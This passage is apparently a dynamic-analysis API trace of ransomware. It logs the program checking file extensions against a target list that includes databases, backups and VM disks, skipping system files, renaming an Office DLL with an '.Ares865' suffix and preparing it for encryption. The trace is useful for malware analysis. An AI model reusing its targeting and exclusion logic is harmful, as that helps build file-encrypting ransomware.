returned 1 [0086.480] lstrlenW (lpString="accde") returned 5 [0086.480] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.480] lstrlenW (lpString="accdr") returned 5 [0086.480] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.480] lstrlenW (lpString="accdt") returned 5 [0086.480] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.480] lstrlenW (lpString="accdw") returned 5 [0086.480] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.480] lstrlenW (lpString="accft") returned 5 [0086.480] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.480] lstrlenW (lpString="adb") returned 3 [0086.480] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.480] lstrlenW (lpString="adb") returned 3 [0086.480] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.480] lstrlenW (lpString="ade") returned 3 [0086.480] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.480] lstrlenW (lpString="adf") returned 3 [0086.480] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.480] lstrlenW (lpString="adn") returned 3 [0086.480] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.480] lstrlenW (lpString="adp") returned 3 [0086.480] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.480] lstrlenW (lpString="alf") returned 3 [0086.480] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.480] lstrlenW (lpString="ask") returned 3 [0086.480] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.480] lstrlenW (lpString="btr") returned 3 [0086.480] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.480] lstrlenW (lpString="cat") returned 3 [0086.481] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.481] lstrlenW (lpString="cdb") returned 3 [0086.481] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.481] lstrlenW (lpString="ckp") returned 3 [0086.481] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.481] lstrlenW (lpString="cma") returned 3 [0086.481] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.481] lstrlenW (lpString="cpd") returned 3 [0086.481] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.481] lstrlenW (lpString="dacpac") returned 6 [0086.481] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.481] lstrlenW (lpString="dad") returned 3 [0086.481] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.481] lstrlenW (lpString="dadiagrams") returned 10 [0086.481] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0086.481] lstrlenW (lpString="daschema") returned 8 [0086.481] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.481] lstrlenW (lpString="db-journal") returned 10 [0086.481] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0086.481] lstrlenW (lpString="db-shm") returned 6 [0086.481] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.481] lstrlenW (lpString="db-wal") returned 6 [0086.481] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.481] lstrlenW (lpString="dbc") returned 3 [0086.481] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.481] lstrlenW (lpString="dbs") returned 3 [0086.481] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.481] lstrlenW (lpString="dbt") returned 3 [0086.481] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.481] lstrlenW (lpString="dbv") returned 3 [0086.481] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.481] lstrlenW (lpString="dbx") returned 3 [0086.481] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.481] lstrlenW (lpString="dcb") returned 3 [0086.481] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.481] lstrlenW (lpString="dct") returned 3 [0086.481] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.482] lstrlenW (lpString="dcx") returned 3 [0086.482] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.482] lstrlenW (lpString="ddl") returned 3 [0086.482] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.482] lstrlenW (lpString="dlis") returned 4 [0086.482] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.486] lstrlenW (lpString="dp1") returned 3 [0086.486] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.486] lstrlenW (lpString="dqy") returned 3 [0086.486] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.486] lstrlenW (lpString="dsk") returned 3 [0086.486] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.486] lstrlenW (lpString="dsn") returned 3 [0086.486] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.486] lstrlenW (lpString="dtsx") returned 4 [0086.486] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.486] lstrlenW (lpString="dxl") returned 3 [0086.486] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.486] lstrlenW (lpString="eco") returned 3 [0086.486] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.486] lstrlenW (lpString="ecx") returned 3 [0086.486] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.487] lstrlenW (lpString="edb") returned 3 [0086.487] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.487] lstrlenW (lpString="epim") returned 4 [0086.487] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.487] lstrlenW (lpString="fcd") returned 3 [0086.487] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.487] lstrlenW (lpString="fdb") returned 3 [0086.487] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.487] lstrlenW (lpString="fic") returned 3 [0086.487] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.487] lstrlenW (lpString="flexolibrary") returned 12 [0086.487] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0086.487] lstrlenW (lpString="fm5") returned 3 [0086.487] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.487] lstrlenW (lpString="fmp") returned 3 [0086.487] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.487] lstrlenW (lpString="fmp12") returned 5 [0086.487] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.487] lstrlenW (lpString="fmpsl") returned 5 [0086.487] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.487] lstrlenW (lpString="fol") returned 3 [0086.487] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.487] lstrlenW (lpString="fp3") returned 3 [0086.487] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.487] lstrlenW (lpString="fp4") returned 3 [0086.487] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.487] lstrlenW (lpString="fp5") returned 3 [0086.487] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.487] lstrlenW (lpString="fp7") returned 3 [0086.487] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.487] lstrlenW (lpString="fpt") returned 3 [0086.487] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.487] lstrlenW (lpString="frm") returned 3 [0086.487] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.487] lstrlenW (lpString="gdb") returned 3 [0086.487] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.487] lstrlenW (lpString="gdb") returned 3 [0086.488] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.488] lstrlenW (lpString="grdb") returned 4 [0086.488] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.488] lstrlenW (lpString="gwi") returned 3 [0086.488] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.488] lstrlenW (lpString="hdb") returned 3 [0086.488] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.488] lstrlenW (lpString="his") returned 3 [0086.488] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.488] lstrlenW (lpString="ib") returned 2 [0086.488] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.488] lstrlenW (lpString="idb") returned 3 [0086.488] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.488] lstrlenW (lpString="ihx") returned 3 [0086.488] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.488] lstrlenW (lpString="itdb") returned 4 [0086.488] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.488] lstrlenW (lpString="itw") returned 3 [0086.488] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.488] lstrlenW (lpString="jet") returned 3 [0086.488] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.488] lstrlenW (lpString="jtx") returned 3 [0086.488] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.488] lstrlenW (lpString="kdb") returned 3 [0086.488] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.488] lstrlenW (lpString="kexi") returned 4 [0086.488] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.488] lstrlenW (lpString="kexic") returned 5 [0086.488] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.488] lstrlenW (lpString="kexis") returned 5 [0086.488] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.488] lstrlenW (lpString="lgc") returned 3 [0086.488] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.488] lstrlenW (lpString="lwx") returned 3 [0086.488] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.488] lstrlenW (lpString="maf") returned 3 [0086.488] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.489] lstrlenW (lpString="maq") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.489] lstrlenW (lpString="mar") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.489] lstrlenW (lpString="marshal") returned 7 [0086.489] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.489] lstrlenW (lpString="mas") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.489] lstrlenW (lpString="mav") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.489] lstrlenW (lpString="maw") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.489] lstrlenW (lpString="mdbhtml") returned 7 [0086.489] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.489] lstrlenW (lpString="mdn") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.489] lstrlenW (lpString="mdt") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.489] lstrlenW (lpString="mfd") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.489] lstrlenW (lpString="mpd") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.489] lstrlenW (lpString="mrg") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.489] lstrlenW (lpString="mud") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.489] lstrlenW (lpString="mwb") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.489] lstrlenW (lpString="myd") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.489] lstrlenW (lpString="ndf") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.489] lstrlenW (lpString="nnt") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.489] lstrlenW (lpString="nrmlib") returned 6 [0086.489] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.489] lstrlenW (lpString="ns2") returned 3 [0086.489] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.490] lstrlenW (lpString="ns3") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.490] lstrlenW (lpString="ns4") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.490] lstrlenW (lpString="nsf") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.490] lstrlenW (lpString="nv") returned 2 [0086.490] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.490] lstrlenW (lpString="nv2") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.490] lstrlenW (lpString="nwdb") returned 4 [0086.490] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.490] lstrlenW (lpString="nyf") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.490] lstrlenW (lpString="odb") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.490] lstrlenW (lpString="odb") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.490] lstrlenW (lpString="oqy") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.490] lstrlenW (lpString="ora") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.490] lstrlenW (lpString="orx") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.490] lstrlenW (lpString="owc") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.490] lstrlenW (lpString="p96") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.490] lstrlenW (lpString="p97") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.490] lstrlenW (lpString="pan") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.490] lstrlenW (lpString="pdb") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.490] lstrlenW (lpString="pdm") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.490] lstrlenW (lpString="pnz") returned 3 [0086.490] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.491] lstrlenW (lpString="qry") returned 3 [0086.491] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.491] lstrlenW (lpString="qvd") returned 3 [0086.491] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.491] lstrlenW (lpString="rbf") returned 3 [0086.491] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.491] lstrlenW (lpString="rctd") returned 4 [0086.491] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.491] lstrlenW (lpString="rod") returned 3 [0086.491] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.491] lstrlenW (lpString="rodx") returned 4 [0086.491] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.491] lstrlenW (lpString="rpd") returned 3 [0086.491] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.491] lstrlenW (lpString="rsd") returned 3 [0086.491] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.491] lstrlenW (lpString="sas7bdat") returned 8 [0086.491] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.491] lstrlenW (lpString="sbf") returned 3 [0086.491] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.491] lstrlenW (lpString="scx") returned 3 [0086.491] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.491] lstrlenW (lpString="sdb") returned 3 [0086.491] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.491] lstrlenW (lpString="sdc") returned 3 [0086.491] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.491] lstrlenW (lpString="sdf") returned 3 [0086.491] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.491] lstrlenW (lpString="sis") returned 3 [0086.491] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.491] lstrlenW (lpString="spq") returned 3 [0086.491] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.491] lstrlenW (lpString="te") returned 2 [0086.491] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.491] lstrlenW (lpString="teacher") returned 7 [0086.491] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.491] lstrlenW (lpString="tmd") returned 3 [0086.491] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.492] lstrlenW (lpString="tps") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.492] lstrlenW (lpString="trc") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.492] lstrlenW (lpString="trc") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.492] lstrlenW (lpString="trm") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.492] lstrlenW (lpString="udb") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.492] lstrlenW (lpString="udl") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.492] lstrlenW (lpString="usr") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.492] lstrlenW (lpString="v12") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.492] lstrlenW (lpString="vis") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.492] lstrlenW (lpString="vpd") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.492] lstrlenW (lpString="vvv") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.492] lstrlenW (lpString="wdb") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.492] lstrlenW (lpString="wmdb") returned 4 [0086.492] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.492] lstrlenW (lpString="wrk") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.492] lstrlenW (lpString="xdb") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.492] lstrlenW (lpString="xld") returned 3 [0086.492] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.492] lstrlenW (lpString="xmlff") returned 5 [0086.492] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.492] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.Ares865") returned 78 [0086.492] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.505] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.505] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=53600) returned 1 [0086.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.506] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.506] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.506] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.506] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd460, lpName=0x0) returned 0x15c [0086.508] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd460) returned 0x190000 [0086.524] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.525] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.525] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.525] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.525] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.525] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.525] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.525] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.525] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.525] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0086.526] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.526] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0086.526] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.526] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0086.526] CloseHandle (hObject=0x15c) returned 1 [0086.526] CloseHandle (hObject=0x118) returned 1 [0086.526] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.526] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.526] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.527] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x19196700, ftCreationTime.dwHighDateTime=0x1cac804, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x19196700, ftLastWriteTime.dwHighDateTime=0x1cac804, nFileSizeHigh=0x0, nFileSizeLow=0x43560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PPINTL.REST.trx_dll", cAlternateFileName="PPINTL~2.TRX")) returned 1 [0086.527] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.527] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.527] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2=".") returned 1 [0086.527] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="..") returned 1 [0086.527] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="windows") returned -1 [0086.527] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="bootmgr") returned 1 [0086.527] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="temp") returned -1 [0086.527] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="pagefile.sys") returned 1 [0086.527] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="boot") returned 1 [0086.527] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="ids.txt") returned 1 [0086.527] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0086.527] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="perflogs") returned 1 [0086.527] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="MSBuild") returned 1 [0086.527] lstrlenW (lpString="PPINTL.REST.trx_dll") returned 19 [0086.527] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll") returned 70 [0086.527] lstrcpyW (in: lpString1=0x2cce468, lpString2="PPINTL.REST.trx_dll" | out: lpString1="PPINTL.REST.trx_dll") returned="PPINTL.REST.trx_dll" [0086.527] lstrlenW (lpString="PPINTL.REST.trx_dll") returned 19 [0086.528] lstrlenW (lpString="Ares865") returned 7 [0086.528] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.528] lstrlenW (lpString=".dll") returned 4 [0086.528] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2=".dll") returned 1 [0086.528] lstrlenW (lpString=".lnk") returned 4 [0086.528] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2=".lnk") returned 1 [0086.528] lstrlenW (lpString=".ini") returned 4 [0086.528] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2=".ini") returned 1 [0086.528] lstrlenW (lpString=".sys") returned 4 [0086.528] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2=".sys") returned 1 [0086.528] lstrlenW (lpString="PPINTL.REST.trx_dll") returned 19 [0086.528] lstrlenW (lpString="bak") returned 3 [0086.528] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.528] lstrlenW (lpString="ba_") returned 3 [0086.528] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.528] lstrlenW (lpString="dbb") returned 3 [0086.528] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.528] lstrlenW (lpString="vmdk") returned 4 [0086.528] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.528] lstrlenW (lpString="rar") returned 3 [0086.528] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.528] lstrlenW (lpString="zip") returned 3 [0086.528] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.528] lstrlenW (lpString="tgz") returned 3 [0086.528] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.528] lstrlenW (lpString="vbox") returned 4 [0086.528] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.528] lstrlenW (lpString="vdi") returned 3 [0086.528] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.528] lstrlenW (lpString="vhd") returned 3 [0086.528] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.528] lstrlenW (lpString="vhdx") returned 4 [0086.528] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.528] lstrlenW (lpString="avhd") returned 4 [0086.528] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.528] lstrlenW (lpString="db") returned 2 [0086.528] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.529] lstrlenW (lpString="db2") returned 3 [0086.529] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.529] lstrlenW (lpString="db3") returned 3 [0086.529] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.529] lstrlenW (lpString="dbf") returned 3 [0086.529] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.529] lstrlenW (lpString="mdf") returned 3 [0086.529] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.529] lstrlenW (lpString="mdb") returned 3 [0086.529] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.529] lstrlenW (lpString="sql") returned 3 [0086.529] lstrcmpiW (lpString1="dll", 